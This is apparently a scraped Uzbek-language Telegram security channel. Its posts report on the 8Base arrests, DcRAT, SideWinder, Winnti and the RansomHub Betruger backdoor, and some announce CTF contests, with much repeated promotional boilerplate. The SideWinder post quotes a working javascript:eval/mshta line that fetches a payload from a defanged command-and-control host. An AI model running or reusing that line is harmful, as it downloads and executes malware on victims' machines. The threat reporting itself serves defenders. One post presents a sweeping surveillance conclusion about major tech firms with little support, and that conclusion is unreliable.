Hujum quyidagi bosqichlardan iborat:
Why waste time? Join the community today!
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
https://t.me/boost/CentiSec
Why waste time? Join the community today!
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
Ushbu 4 kishi faqat 2 erkak va 2 ayol sifatida aniqlangan. Ularning barchasi yevropalik ekani ma’lum. Tailand rasmiylari 40 dan ortiq buyum dalil sifatida musodara qilinganini aytdi. Ularga elektron qurilmalar va raqamli hamyonlar ham kiradi. Shveytsariya ushbu shaxslarning ekstraditsiyasini talab qilgan. Hibsga olinganlar butun dunyo bo‘ylab 16 million dollardan ortiq mablag‘ o‘g‘irlaganlikda gumon qilinmoqda.
Batafsil: https://techcrunch.com/2025/02/10/global-police-operation-seizes-8base-ransomware-gang-leak-site/
Why waste time? Join the community today!
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
Hakerlar zararli dasturlarni tarqatish uchun:
Bu orqali BACKORDER (loader) ni yangi versiyasi tarqatishmoqda. Oldindan Sandworm bilan bog‘liq bo‘lgan ushbu mehanizm Dark Crystal RAT (DcRAT) zararli dasturini tizimlarga o‘rnatib, hujumchilarga quyidagilarni amalga oshirish imkonini beradi:
Why waste time? Join the community today!
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
Berilgan vazifani yechib,
CTF tafsilotlari va topshiriq tez orada e’lon qilinadi. Tayyor turing!
Why waste time? Join the community today!
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
2024-yilning ikkinchi yarmidan boshlab, yangi taktikalar, texnikalar va protseduralar kuzatilmoqda. Jumladan, jabrlanuvchiga PDF hujjati yuborilib, ushbu hujjatda keltirilgan havolaga bosish orqali CVE-2024-38213 zaifligidan foydalanish natijasida tizimga "pdf.lnk" kengaytmali LNK fayli yuklab olinadi. Ushbu fayl ishga tushirilganda, PowerShell buyrug‘ini bajarish orqali qurbonning kompyuteriga zararli hujjat yuklab va ko‘rsatiladi, shuningdek EXE/DLL fayllarni yuklash, ularning doimiyligini ta’minlash (Windows "Run" bo‘limi orqali) va ishga tushirish amalga oshiriladi.
Ma’lumki, ushbu kiber tahdidni amalga oshirishda quyidagi dasturiy vositalar ishlatilgan:
Why waste time? Join the community today!
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
— Proton bergan ma’lumotiga ko’ra, texnik gigantlar, ya’ni Google, Meta va Apple Amerikaning maxsus bo’linmalari va havfsizlik bo’linmalari uchun ma’lumotlar yetkazuvchi sifatida gavdalandi.
Bu shuni anglatadiki Amerika yirik bo’lgan IT gigantlarini kuzatuv uchun foydalanib kelayapti.
Why waste time? Join the community today!
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
Berilgan vazifani yechib,
CTF tafsilotlari va topshiriq tez orada e’lon qilinadi. Tayyor turing!
Why waste time? Join the community today!
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
APT guruhi turli sohalarga katta qiziqish uyg'otadi va hujumlarning katta geografiyasi bilan tanishing:
Guruh o'z faoliyatini, ayniqsa Afrikada yanada kengaytirdi. Hujumlar Avstriya, Bangladesh, Kambodja, Jibuti, Misr, Indoneziya, Mozambik, Myanma, Nepal, Pokiston, Filippin, Shri-Lanka, Birlashgan Arab Amirliklari va Vetnamda aniqlangan.
So‘nggi hujumlarda SideWinder Afg‘oniston, Jazoir, Bolgariya, Xitoy, Hindiston, Maldiv orollari, Ruanda, Saudiya Arabistoni, Turkiya va Ugandadagi diplomatik vakolatxonalarni ham nishonga oldi.
Zararli ilovali fishing xabari > RTF ekspluatatsiyasi >
javascript:eval("var gShZVnyR = new ActiveXObject('WScript.Shell');gShZVnyR.Run('mshta.exe)
hxxps://dgtk.depo-govpk[.]com/19263687/trui',0);window.close();")
Ko'rib turganimizdek, mshta ishga tushirildi, u C2 dan hta faylini yuklashi kerak, keyin qonuniy jarayon bilan yuklangan Backdoor Loader kutubxonasi yuklanadi.
Hujum quyidagi nomlarga ega edi:
propsys.dll
vsstrace.dll
JetCfg.dll
Policymanager.dll
winmm.dll
xmllite.dll
dcntele.dll
UxTheme.dll
Bu kutubxona Stealer Bot implantini xotiraga yuklash uchun kerak.
Why waste time? Join the community today!
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
10 12👍7
— Winnti guruhining Yaponiya tashkilotiga qaratilgan hujum kampaniyasi
WebShell:
- China chopper
- Behinder (Ice Scorpion)
- sqlmap file uploader
Winnti zararli dasturlari (Rootkit, RAT, Loader)
- Dastlabki kirish: "China Chopper" va "Behinder" kabi veb-qobiqlarni joylashtirish uchun Enterprise Resource Planning (ERP) tizimlarida SQL injection zaifliklaridan foydalanish, dastlabki kirish va razvedkani osonlashtiradi.
- Zararli dasturlarni joylashtirish: xavfsizlik mahsulotlarini chetlab o'tish uchun noaniqlik, yangilangan shifrlash algoritmlari va ilg'or qochish usullarini o'z ichiga olgan Winnti zararli dasturining takomillashtirilgan versiyasini o'rnatish.
- Yanal harakat: bir nechta tashkilotlarga ta'sir qiladigan o'zaro bog'langan tarmoqlar bo'ylab zararli dasturlarni tarqatish uchun, xususan, boshqariladigan xizmat ko'rsatuvchi provayderlar (MSP) ichida buzilgan umumiy hisoblardan foydalanish:
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
10 9👍5
Hujumchilar Yangi Maxsus Backdoor-dan Foydalanmoqda 👽
RansomHub:
Symantec tadqiqotchilari aniqlashicha, RansomHub RaaS dasturining kamida bitta affillangan ishtirokchisi Betruger nomli yangi backdoor-dan foydalanishni boshlagan. Ushbu ko‘p funksiyali zararli dastur ehtimoliy ravishda to‘lov talab qiluvchi hujumlar uchun maxsus ishlab chiqilgan.
Betruger funksiyalari:
Backdoor fayllari mailer.exe va turbomailer.exe nomlari ostida bo‘lib, ular qonuniy dasturlar sifatida yashirishga urinish bo‘lishi mumkin.
🔗 Source.
✉️ Telegram ✊ Forum
🌐 Linkedin 🌐 Web
📷 Instagram 📹 TikTok
@CentiSec
RansomHub:
Symantec tadqiqotchilari aniqlashicha, RansomHub RaaS dasturining kamida bitta affillangan ishtirokchisi Betruger nomli yangi backdoor-dan foydalanishni boshlagan. Ushbu ko‘p funksiyali zararli dastur ehtimoliy ravishda to‘lov talab qiluvchi hujumlar uchun maxsus ishlab chiqilgan.
Betruger funksiyalari:
⚪️ Ekran skrinshotlarini olish⚪️ Keylogging (klaviatura yozuvlarini qayd etish)⚪️ Fayllarni boshqaruv serveriga yuklash⚪️ Tarmoqni skanerlash⚪️ Huquqlarni oshirish (privilege escalation)⚪️ Akkount ma’lumotlarini o‘g‘irlash
Backdoor fayllari mailer.exe va turbomailer.exe nomlari ostida bo‘lib, ular qonuniy dasturlar sifatida yashirishga urinish bo‘lishi mumkin.
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
10 15👍5
Machine haqida batafsil ma'lumot olmoqchi bo'lsangiz:
Musobaqa 3-Iyun soat 18:00-dan ertangi 4-Iyun soat 18:00-gacha davom etadi, barchangizga omad!
Forumga qo'shiling —
Biz shunchaki o'rganuvchilarmiz !!!
@CentiSec
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5 5